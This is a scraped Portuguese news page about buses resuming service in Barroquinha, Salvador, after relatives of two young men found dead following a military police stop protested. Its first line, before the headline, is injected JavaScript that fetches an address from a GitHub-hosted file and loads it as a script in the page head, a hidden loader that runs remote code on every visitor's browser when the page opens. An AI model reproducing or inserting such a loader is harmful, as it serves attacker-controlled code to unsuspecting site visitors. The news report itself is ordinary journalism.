;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Ônibus voltam a circular na Barroquinha, em Salvador, após protesto de familiares de jovens encontrados mortos – O Povo News

O Povo News

Ônibus voltam a circular na Barroquinha, em Salvador, após protesto de familiares de jovens encontrados mortos

Os ônibus do transporte público de Salvador voltaram circular no bairro da Barroquinha, no Centro de Salvador, no início da manhã desta terça-feira (21). O serviço estava suspenso na região após protesto de familiares de dois jovens que foram encontrados mortos. Os dois foram alvos de uma abordagem da Polícia Militar, na capital baiana, no domingo (19).

Os rodoviários deixaram de rodar na localidade na segunda-feira (20), porque houve apedrejamento e tentativa de incendiar um coletivo, segundo testemunhas.

Segundo a Secretaria Municipal de Mobilidade Urbana (Semob), os ônibus seguiam apenas até o Aquidabã, pois os rodoviários disseram que só retornariam à Barroquinha quando houvesse segurança para que a operação fosse normalizada. O policiamento ostensivo foi reforçado na região.

As lojas da Barroquinha, conhecida por ter um comércio pujante, também fecharam mais cedo, por volta das 14h30, e foram reabertas normalmente nesta terça.

Segundo os familiares dos jovens, na manhã do domingo, os dois seguiam para a praia e, ao passarem pela Ladeira da Preguiça, foram abordados por militares das Rondas Especiais (Rondesp).

As famílias contam que os rapazes foram confundidos com assaltantes de ônibus e levados para uma delegacia. Eles teriam sido liberados entre as 15h e 17h. No entanto, as famílias disseram que eles não foram mais vistos. Os dois só foram encontrados na manhã desta segunda, mortos, na região de Valéria.

“Eles disseram que liberaram ontem, 17h, e até agora nada. Aí hoje apareceu os corpos dos dois na Brasil Gás”, disse a dona de casa, Juliana Santos.

Um dos jovens é o Jamilton Bispo da Silva, de 22 anos, e o outro é o Jorge Luís Silva Nascimento, de 23. As famílias acusam os policiais militares de terem matado os dois. Por isso, o grupo fez um protesto na Avenida J. J. Seabra, para pedir justiça.

Em nota, a Policia Militar informou que policiais militares da Operação Gêmeos realizavam rondas no na região do Comércio quando abordaram os dois rapazes e levaram para o Grupamento Especial de Repressão a Roubos em Coletivos (Gerrc). De acordo com o órgão, um deles foi reconhecido pelo cobrador do ônibus como autor do roubo.

O pai de Jorge Luís, o fotógrafo Jorge Nascimento, falou sobre a situação e reiterou que o filho não tinha envolvimento com a criminalidade.

Exaltados, os moradores foram contidos pela PM, que usou spray de pimenta e balas de borracha. Quatro pessoas – dois homens e duas mulheres – foram detidos pelos policiais. Informações preliminares apontam que uma das mulheres está grávida.

A PM relatou que os manifestantes foram levados para a Central de Flagrantes depois de atirarem pedras em um ônibus que passava no local. O protesto foi finalizado e reiniciado por volta das 11h, no entanto a situação foi controlada. O policiamento está reforçado no local.

A PM afirmou ainda que todo processo investigativo é conduzido pela Polícia Civil, portanto, disponibiliza os canais de comunicação para registros de denúncias: 0800 284 0011 (Ouvidoria) e o endereço da Corregedoria Geral, localizada na Rua Amazonas, nº 13, Pituba.

Já a Polícia Civil disse que os dois foram conduzidos por uma equipe da PM para o Gerrc, na tarde de domingo (19). Segundo os policiais, eles

realizavam rondas na região, quando perceberam dois homens em atitude suspeita.

No Gerrc, de acordo com a polícia, os dois foram ouvidos e liberados, pois não havia mandado de prisão contra eles e nem indícios de materialidade de crime.

por: G1

Compartilhe nas redes sociais:

Leia mais

20241009_090115
20241010_093532
o-tempo-no-brasil-na-semana-chuvas-se-espalham-pelo-pais-com-alertas-tempo-severo-no-sul-sudeste-e-no-centro-oeste-1728246745788_512
OIP (1)
page
Imagem do WhatsApp de 2024-10-09 à(s) 16.39
OIP
turismo-na-bahia-melhores-lugares-para-viajar
baixados (17)
Imagem do WhatsApp de 2024-10-08 à(s) 19.09
loja-correios
Capturar